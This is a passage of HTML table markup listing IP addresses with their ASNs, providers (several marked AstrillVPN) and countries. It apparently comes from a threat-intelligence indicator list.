style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Cybernet</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(PK)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">104.129.55.3</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">8100</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">QuadraNet</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">104.206.40.138</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">62904</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Eonix Corporation</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">AstrillVPN</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">104.223.97.2</span></p> </td> <td 
style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">8100</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">QuadraNet</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">104.223.98.2</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">8100</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">QuadraNet</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">104.243.33.74</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">23470</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">ReliableSite.Net LLC</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span 
style="vertical-align: baseline;">104.250.148.58</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">53850</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">GorillaServers</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">AstrillVPN</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">109.82.113.75</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">35819</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Mobily</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(SA)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">113.227.237.46</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">4837</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">China Unicom</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: 
baseline;">(CN)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">119.155.190.202</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">56167</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Ufone</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(PK)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">123.190.56.214</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">4837</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">China Unicom</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(CN)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">155.94.255.2</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">8100</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">QuadraNet</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px 
solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">174.128.251.99</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">46844</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Sharktech</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">AstrillVPN</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">18.144.99.240</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">16509</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Amazon.com</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">184.12.141.109</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">5650</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Frontier 
Communications</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">192.119.10.67</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">55081</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">24 Shells</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">AstrillVPN</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">192.119.11.250</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">55081</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">24 Shells</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">AstrillVPN</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">192.74.247.161</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; 
padding: 16px;"> <p><span style="vertical-align: baseline;">54600</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Peg Tech</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">AstrillVPN</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">198.135.49.154</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">396073</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Majestic Hosting Solutions, LLC</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">AstrillVPN</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">198.2.228.20</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">54600</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Peg Tech</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">AstrillVPN</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span 
style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">198.23.148.18</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">36352</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">ColoCrossing</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">199.115.99.34</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">46844</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Sharktech</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">AstrillVPN</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">204.188.232.195</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">46844</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Sharktech</span></p> </td> <td style="vertical-align: middle; 
border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">AstrillVPN</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">207.126.89.11</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">6939</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Hurricane Electric</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">208.68.173.244</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">29838</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Atlantic Metro Communications</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">23.105.155.2</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">396362</span></p> </td> <td style="vertical-align: 
middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Leaseweb New York</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">23.237.32.34</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">174</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Fdcservers</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">3.15.4.158</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">16509</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Amazon.com</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">37.19.199.133</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span 
style="vertical-align: baseline;">212238</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Datacamp Limited</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">37.19.221.228</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">212238</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Datacamp Limited</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">37.43.225.43</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">35819</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Mobily</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(SA)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">38.140.49.92</span></p> </td> <td 
style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">174</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Cogent Communications</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">AstrillVPN</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">38.42.94.148</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">27611</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Starry</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">42.84.228.232</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">4837</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">China Unicom</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(CN)</span></p> </td> </tr> <tr> <td 
style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">5.244.93.199</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">35819</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Mobily</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(SA)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">50.39.182.185</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">27017</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Ziply Fiber</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">51.39.228.134</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">43766</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Zain Saudi Arabia</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span 
style="vertical-align: baseline;">(SA)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">54.200.217.128</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">16509</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Amazon.com</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">60.20.1.234</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">4837</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">China Unicom</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(CN)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">66.115.157.242</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">46562</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Performive</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td 
style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">67.129.13.170</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">209</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">CenturyLink</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">67.82.9.140</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">6128</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Optimum Online</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">68.197.75.194</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">6128</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Optimum Online</span></p> </td> <td 
style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">70.39.103.3</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">46844</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Sharktech</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">AstrillVPN</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">71.112.196.114</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">701</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Verizon Fios Business</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">71.112.196.115</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">701</span></p> </td> <td 
style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Verizon Fios Business</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">72.193.13.228</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">22773</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Cox Communications</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">74.222.20.18</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">74.222.20.18</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Perfect International</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">AstrillVPN</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: 
baseline;">74.63.233.50</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">46475</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Limestone Networks</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">AstrillVPN</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">(US)</span></p> </td> </tr> <tr> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">98.179.96.75</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">22773</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> <p><span style="vertical-align: baseline;">Cox Communications</span></p> </td> <td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"> </td> <td style="vertical-align: middle; border: 1px solid 